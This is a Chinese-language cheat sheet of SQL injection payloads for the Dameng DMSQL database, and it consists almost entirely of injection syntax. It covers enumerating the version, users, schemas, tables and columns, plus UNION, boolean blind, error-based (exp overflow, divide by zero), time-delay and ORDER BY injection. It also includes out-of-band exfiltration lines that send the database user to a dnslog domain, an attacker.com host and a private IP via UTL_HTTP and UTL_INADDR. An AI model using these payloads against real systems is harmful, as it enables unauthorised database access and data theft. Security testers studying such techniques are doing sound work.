达梦数据库DMSQL-SQL注入小记

1
2
3
4
5
6

select user			-- 返回当前用户，默认是SYSDBA
select user()		-- 同上
select cur_database		-- 返回当前库名，默认是DAMENG
select cur_database() 	-- 同上
select  1 						-- select语句后面可以不跟表名，存在默认表dual，可以接from dual
select 1 from dual where 1=1 && 1=1		-- &&可以代替and，但||不能代替or

1
2

SELECT 1; -- 单行注释
select 1/*aaa*/from dual  	-- 支持/**/多行注释

1
2
3

md5(1)							-- 返回 0xC4CA4238A0B923820DCC509A6F75849B，返回对应MD5值，前面加了0x
exp(if(1=1,710,1))
exp(710)				-- 返回整数溢出错误，使用这种方式可以强制BOOL盲注

1
2
3
4
5

ASCII(str)			返回字符串第一个字符的ASCII值, ASCII('a') = 97
char(num)				返回参数num对应的ASCII字符，
chr(num)				同上，CHR(97) = a
HEX(str)				返回16进制字符串形式, hex(12) = 3132
UNHEX(str)			返回对应的字符串，unhex(3132) = 12

1
2
3
4
5
6

substring('1234',2,1)			-- 同substr函数
substr('1234',2,1)				-- 返回2，第二个参数从第几位开始取值，第三个参数代表截图多少位
-- 多种格式 SUBSTR(str,pos)、SUBSTR(str FROM pos)、SUBSTR(str,pos,len)、SUBSTR(str FROM pos FOR len), 如 substr('1234' from 2 for 1) = 2

left('123456', 3)					-- 返回123，第二个参数代表返回左边几位的字符
right('123456', 3)				-- 返回456，第二个参数代表返回右边几位的字符

1
2
3
4
5

||																-- 将左右两侧字符串进行连接
CONCAT(str1,str2...)									-- 将多个字符串合并为一个字符串
CONCAT_WS(separator,str1,str2...)				-- 通过分隔符separator将字符串连接在一起
WM_CONCAT(column_name)							-- 类似 GROUP_CONCAT(...)，将某一列中的多个字符串按照一定顺序拼接成一个大的字符串，通常用于分组后的字符串拼接
LISTAGG(column_name, separator)					-- 和 WM_CONCAT 类似，也是用于将分组后的列值进行拼接，并且提供了更多的控制选项，如指定分隔符等。

1
2
3
4
5
6
7

LENGTH(str)		-- 返回字符串的长度
len(str)			-- 返回字符串的长度
LOWER(str)		-- 将字符串字母全部转成小写。同：LCASE(str)。
UPPER(str)		-- 将字符串字母全部转成大写。同：UCASE(str)。
TO_CHAR(date/time_value, 'format')   	-- 将日期、时间、数字等类型的数据转换为字符类型
TO_NUMBER(char_value, 'format')			 -- 将字符类型的数据转换为数字类型
TO_DATE(char_value, 'format')				 -- 将字符类型的数据转换为日期类型。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

-- 查看数据库版本
SELECT banner FROM v$version;			-- 注意：返回是多行
SELECT banner FROM v$version limit 0,1;
SELECT WM_CONCAT(banner) FROM v$version  	-- 在一行中显示
SELECT LISTAGG(banner, '， ') FROM v$version;  	-- 在一行中显示，高版本可用
-- 获取当前用户、当前数据库
select user
select user()
SELECT user FROM DUAL;
select cur_database
-- 获取所有用户名
select USERNAME from SYS.ALL_USERS
select WM_CONCAT(USERNAME) from SYS.ALL_USERS

1

SELECT NAME, TYPE, VALUE FROM V$PARAMETER;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

NAME									VALUE
SYSTEM_PATH				/home/dmdba/data/DAMENG
CONFIG_PATH				/home/dmdba/data/DAMENG
TEMP_PATH					/home/dmdba/data/DAMENG
BAK_PATH					/home/dmdba/data/DAMENG/bak
DFS_PATH					$/DAMENG
INSTANCE_NAME			DMSERVER
INSTANCE_ADDR
PORT_NUM					5236
SVR_LOG_NAME			SLOG_ALL
TRACE_PATH				/home/dmdba/data/DAMENG/trace
BCT_PATH					/home/dmdba/data/DAMENG

1
2

SELECT VALUE FROM V$PARAMETER WHERE NAME = 'SYSTEM_PATH';
SELECT NAME, VALUE FROM V$PARAMETER WHERE name LIKE '%INSTANCE%'

1

select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCH'

1

select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCHOBJ' and SUBTYPE$='UTAB' and SCHID=150995949

1

select NAME,TYPE$,DEFVAL from SYS.SYSCOLUMNS where ID=1078

1

select USERNAME from SYS.ALL_USERS

1

select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='SYSDBA' and OBJECT_TYPE='SCH'

1

select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='OTHER' and OBJECT_TYPE='TABLE'

1

select OWNER,TABLE_NAME,SCHEMA_NAME,COLUMN_NAME from SYS.ALL_COL_COMMENTS where SCHEMA_NAME='OTHER' and TABLE_NAME='xxxxxx'

1
2

 order by num
 union select 1,2,3...			-- 注意列数和类型要相同

1

select 1 from dual where 1=1/0

1

SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=1/if(len(user)=6,1,0) ORDER BY id DESC;

1
2
3
4
5
6
7

select exp(710)
select exp(if(1=1,710,1))			-- 数据溢出
select exp(if(len(user)=6,710,1))

SELECT *  FROM t1 where rownum<5 AND 1=exp(if(len(user)=6,710,0)) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 ORDER BY id,exp(if(len(user)=6,711,0)) DESC;
SELECT *  FROM t1 where rownum<5 ORDER BY id DESC, exp(if(len(user)=6,710,0));

1
2
3
4
5
6
7
8
9

if(expr，参数1，参数2) -- expr成立时，返回参数1的值;不成立时，返回参数2的值
CASE WHEN exp THEN state1 ELSE state2 END		-- 同IF
DECODE(expr, search1, result1 [, search2, result2,...][, default_result])  -- 类似 switch case, 如果 expr=search1，则返回 result1，否则返回default_result
IFNULL(expr1,expr2)					-- 如果 expr1 不为 NULL，则返回 expr1，否则返回 expr2
NULLIF(expr1,expr2)					-- 若expr1与expr2不同，则返回expr1，否则返回NULL

if(1=ascii(substr('123456',2,1)),2, 1)		-- 综合使用，盲注必备
CASE WHEN len(user)=6 THEN 1 ELSE 0 END
DECODE(len(user),6,1,0)							-- 判断len(user)=6是否成立，成立返回1，否则返回0

1
2
3
4
5

SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=if(len(user)=6,1,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=(case when len(user)=4 then 1 else 0 end) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=decode(len(user),6 ,1,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=IFNULL(len(user)=6,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=NULLIF(len(user)=6,0) ORDER BY id DESC;

1
2
3
4
5
6
7

sleep(n)				-- 休眠n秒，不能和select 一起用，语法错误，失去价值
exec  sleep 5		-- 延时5s
dbms_pipe.receive_message(('a'),2)				-- 可以延时

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; 		-- 如果反查很慢，可能可以
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; 		-- 如果正查很慢
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; 		-- 如果发送TCP包被拦截或者很慢

1
2
3
4
5
6

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;   -- priv
SELECT UTL_INADDR.get_host_address((select user)||'.xxx.dnslog');

SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://xxx.dnslog?'||(select user)) from dual;
select utl_http.request('http://192.168.0.100:8888/?'||(select user)) from dual;

1
2

ORDER BY id^(if(1=2,1,2)
ORDER BY id^(if(len(user)=6,1,2))

1
2
3
4

SELECT * FROM t1 where rownum<5 ORDER BY id^(if(1=2,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id^(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id&(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id|(if(len(user)=6,1,2)) DESC;

1
2

(SELECT * FROM t1 where rownum<5 ORDER BY id) union (select 1,2,user);
(SELECT * FROM t1 where rownum<5 ORDER BY id,null) union (select 1,2,user);

1
2
3

SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY id limit 0,20
 
SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY (select 1 from dual where 1=1/(case when len(user)=6 then 1 else 0 end)) LIMIT 0,20